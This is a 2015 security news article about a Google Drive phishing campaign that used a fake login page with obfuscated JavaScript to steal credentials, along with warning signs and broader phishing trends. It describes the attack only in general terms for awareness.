July 30, 2015 By Douglas Bonderud 3 min read

In March of 2014, cybercriminals ran a campaign of Google Drive phishing attacks designed to grab user credentials and gain complete account access. According to Threatpost, researchers at Elastica Cloud Threat Labs have discovered a new effort with eerily similar traits but one significant update: Additional code is now being used to obfuscate the attempted theft. Here’s a quick rundown of the newest Google threat.

Seems Legitimate

With their new effort, attackers hope to trick users into clicking on a provided Google Drive link and enter their login credentials. But how are savvy users getting taken in by this kind of scam? It has to do with Drive itself. While most people use the service to store spreadsheets, photos and text documents, it’s also possible to host entire websites or single Web pages.

As noted by CSO Online, that’s the bait and switch: Drive is used to host a simple Web page that looks like the Google account login screen and asks for user credentials. Extra code is used to obfuscate JavaScript on the page, which collects login credentials and then forwards them to another website.

From the user perspective, everything seems above board. First, they receive an email saying a trusted contact or unknown entity wants to share a Drive document with them. Clicking the link takes them to a fake Google login page — but one that’s actually hosted by Google Drive itself. What’s more, the page also uses Google’s HTTPS and SLL certificate, making it almost impossible to distinguish from the real thing. Once users enter their username and password, they’re redirected to a PDF document, making the entire scam appear legitimate. Account login information, however, is long gone.

According to Aditya K. Sood of Elastica Cloud Threat Labs, there are a few telltale signs that the attack isn’t a legitimate sharing request. First is the header on the fake Drive page, which reads “Google Drive. One Storage.” What it should say is “One account. All of Google.” In addition, the fake page isn’t set up to actually check credentials; it simply sends them along to another server. This means that if users enter the wrong login and password, they’ll still be taken to off-site PDF documents. Finally, there’s a “Create an Account” link that simply reloads the current page.

Phishing Attacks in a Big Pond

While Sood and her colleagues immediately brought the phishing attacks to Google’s attention, this form of compromise continues to be a popular attack vector. According to Firstpost, for example, phishing attacks triggered a “massive surge in DNS threats” through Q2 of 2015, hitting a record high of 133 on the Infoblox DNS Threat Index during the quarter, almost tripling the score of Q2 2014.

While agencies are doing their best to combat phishing scams, many aren’t even sure what they’re looking for. After the recent U.S. Office of Personnel Management (OPM) breach in April, for example, the U.S. Army flagged an email from identity protection firm CSID as a phishing attempt even though the company was employed by OPM to offer affected workers their services. While the email did share some traits of classic phishing scams — such as a dot-com address instead of dot-gov, as would be expected, a link that asks for personal information and clickable “Enroll Now” button — a quick look at the OPM’s official website would have cleared up any confusion.

There’s a massive pool of users leveraging countless secure and not-so-secure online services, giving malicious actors the ability to pick and choose what type they’ll reel in on any given day. As user knowledge increases, however, cybercriminals are turning to obfuscation and subtle misdirection to gain access — to the point that even large-scale government agencies can’t tell the difference. Best bet? Assume there’s a hook at the end of every unsolicited email — it’s never worth the risky bite.

More from

What does resilience in the cyber world look like in 2025 and beyond?

6 min read -  Back in 2021, we ran a series called “A Journey in Organizational Resilience.” These issues of this series remain applicable today and, in many cases, are more important than ever, given the rapid changes of the last few years. But the term "resilience" can be difficult to define, and when we define it, we may limit its scope, missing the big picture.In the age of generative artificial intelligence (gen AI), the prevalence of breach data from infostealers and the near-constant…

Airplane cybersecurity: Past, present, future

4 min read - With most aviation processes now digitized, airlines and the aviation industry as a whole must prioritize cybersecurity. If a cyber criminal launches an attack that affects a system involved in aviation — either an airline’s system or a third-party vendor — the entire process, from safety to passenger comfort, may be impacted.To improve security in the aviation industry, the FAA recently proposed new rules to tighten cybersecurity on airplanes. These rules would “protect the equipment, systems and networks of transport…

Protecting your digital assets from non-human identity attacks

4 min read - Untethered data accessibility and workflow automation are now foundational elements of most digital infrastructures. With the right applications and protocols in place, businesses no longer need to feel restricted by their lack of manpower or technical capabilities — machines are now filling those gaps.The use of non-human identities (NHIs) to power business-critical applications — especially those used in cloud computing environments or when facilitating service-to-service connections — has opened the doors for seamless operational efficiency. Unfortunately, these doors aren’t the…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today